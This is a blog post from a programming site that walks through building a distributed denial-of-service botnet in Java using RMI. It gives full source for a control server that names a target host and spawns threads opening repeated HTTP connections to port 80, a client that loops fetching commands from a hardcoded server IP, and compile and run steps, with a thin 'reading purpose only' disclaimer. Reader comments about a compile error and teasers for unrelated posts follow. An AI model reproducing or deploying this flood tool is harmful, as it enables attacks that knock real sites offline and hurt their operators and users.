DDOS (Distributed Denial of Service) Attack in Java

-
We often hear about the word DOS attack on a site, and few people often think like DOS only means Disk Operating System. But, here DOS is something big, and we use it to crash and operational site by consuming the quote of daily or monthly or yearly requests of a site.

Here I would like to share a basic program using RMI based bots that will be helpful for reading purpose only. My intention is not to develop hacker but just to give an idea of using RMI in JAVA.

First we have created an interface that will be concreted in it's implementation later. But, the main purpose behind creating this interface is just for RMI as the look up functionality of RMI needs an interface instead of complete implementation.
import java.rmi.*;
// DDOSService Interface
// Interface for a RMI service that will actually attack on a target machine
public interface DDOSService extends java.rmi.Remote
{
public String attack ( )
throws RemoteException;
}
Now this time is just to provide an implementation of that interface:


import java.math.*;
import java.rmi.*;
import java.rmi.server.*;
import java.io.BufferedWriter;
import java.io.IOException;
import java.io.OutputStreamWriter;
import java.net.Socket;
import java.net.UnknownHostException;
//
// DDOSServiceServer
//
// Server for a RMI service that calculates powers
//
public class DDOSServiceServer extends UnicastRemoteObject implements Runnable, DDOSService
{ //Target Machine
    final String TARGET = "wasif-pc";
    static DDOSServiceServer _instance;
    public DDOSServiceServer () throws RemoteException
    {
        super();
    }
    // Calculate the square of a number
    public String attack( )
    throws RemoteException
    {
_instance = new DDOSServiceServer ();
//2 threads on each machine
  for (int i = 0; i < 2; i++)
             new Thread(_instance).start();
        String attack;

attack = "Attacking:"+ TARGET ;
        return attack;
    }
     public void run() {
//1000 HTTP Requests using each client you can send more requests too
         for (int i = 1; i < 1000; i++) {
             try {
                 Socket net = new Socket(TARGET, 80); // connects the Socket to the TARGET port 80.
                  sendRawLine("GET / HTTP/1.1", net); // Sends the GET / OutputStream
                  sendRawLine("Host: " + TARGET, net); // Sends Host: to the OutputStream
                  System.out.println("Attacking on Target  "+TARGET+" with Connection #: " + i);
             } catch (UnknownHostException e) {
                 System.out.println("DDoS.run: " + e);
             } catch (IOException e) {
                 System.out.println("DDoS.run: " + e);
             }
         }
     }

    public static void main ( String args[] ) throws Exception
    {
        // Assign a security manager, in the event that dynamic
// classes are loaded
     
        // Create an instance of our power service server ...
        DDOSServiceServer svr = new DDOSServiceServer();
        // ... and bind it with the RMI Registry
        Naming.bind ("DDOSService", svr);
        System.out.println ("Service bound....");
    }
  public static void sendRawLine(String text, Socket sock) {
         try {
             BufferedWriter out = new BufferedWriter(new OutputStreamWriter(sock.getOutputStream()));
             out.write(text + " ");
             out.flush();
         } catch (IOException ex) {
             ex.printStackTrace();
         }
     }
}

Till now we have almost done with our Server side code which we will be executing at our control panel machine from where we will be able to provide service to all those clients that will be waiting for our command. Actually here we have used RMI in reverse order as the clients are just acquiring the name of target machine from server. And once they got the name they start hitting it from their own machines.

As this code is just a day effort so probably need some further improvement too.

Now finally, we are at a stage to write the client side code that will be performing the actual task of sending fake requests to the client.


import java.rmi.*;
import java.rmi.Naming;
import java.io.*;
//
// DDOSServiceClient
//
public class DDOSServiceClient
{
String attack =""; public static void main(String args[]) throws Exception
{
DDOSServiceClient obj = new DDOSServiceClient() ;
while(true){
obj.attack ="";
try{
obj.go();
}
catch(java.rmi.ConnectException rc){
System.out.println("Connection Failure");
}
catch(java.net.ConnectException rc){
System.out.println("Net Failure");
} catch(java.rmi.NotBoundException je){
System.out.println("java.rmi.NotBoundException");
} System.out.println(obj.attack);
}
}
private static void go() throws Exception{
// Call registry for DDOSService
DDOSServiceClient obj = new DDOSServiceClient() ;
Thread.sleep(5000);
//A server IP that need to be replaced with this IP
DDOSService service = (DDOSService) Naming.lookup
("rmi://192.168.55.44/DDOSService");
DataInputStream din = new
DataInputStream (System.in);
//Calling remote Method
obj.attack = service.attack();
}
}

But in RMI we just need to compile in a bit different way. As it's related to client-server communication so we must need a stub that will be used as a communication  bridge  in between client and a server.

When we are already done with the coding. So, now we need to compile and test it.

javac DDOSServiceClient.java
javac DDOSServiceServer.java
rmic DDOSServiceServer
start rmiregistry

java DDOSServiceServer on server machine
java DDOSServiceClient on client machine.

That's it hope it will be helpful for many.


Comments

  1. arunmonvMay 2, 2016 at 11:20 PM

    error: Stubs are only needed for classes that directly implement an interface that extends java.rmi.Remote; class DDOSServiceServer does not directly implement a remote interface.

    ReplyDelete
  2. arunmonvMay 2, 2016 at 11:20 PM

    how will clear that

    ReplyDelete

Post a Comment

Popular posts from this blog

First Formula 1 Car

-
I have seen so many students in my life as I also do some voluntarily advisory service for IT students.  Not, only this but have also tried to promote the work of those students, where I think the work in not extraordinary but, they have the skill-set to do something beyond the thoughts. Well, Pakistan is considered to be the country lives under the threats of terrorist and the people here always talk about the stuff which is not healthy for anyone including themselves. But, if this tail can be considered true then why different countries on the globe, hire the people from Pakistan and India. As everyone is aware that the people here are talented but unfortunately due to project funding issues and the growing country problems people have started migrating to different lands where they can find peace. As the first statement was not a rumor and it's a bitter reality but along with that the people are talented and always try to do something innovated which can't be expected fro
Read more

Maven + Struts2 + Spring + Hibernate + Struts2-Convention-Plugin

-
Image
After spending so many days and nights and days again I finally be able to achieve the basic Architecture. Well, the basic architecture was quite simple and you will be able to get a lot of tutorials online about it but, probably they have few things missing (i.e. Maven or sometimes Struts2-Convention-Plugin). Reason behind choosing this structure is to make an easy expandable application structure with an isolation in between layers. Reason Behind: Maven is just used for dependency management of libraries and easy deployment. Struts2  is used for UI. Spring for service layer, as we all know we can easily change implementation which will be helpful for us to entertain the change request. Hibernate for ORM that will play with the database. Directory Structure: Don't worry about such a big directory tree. One by one I will tell you each and everything about it. Before starting everything we will start telling you about the pom that will be required to setup the
Read more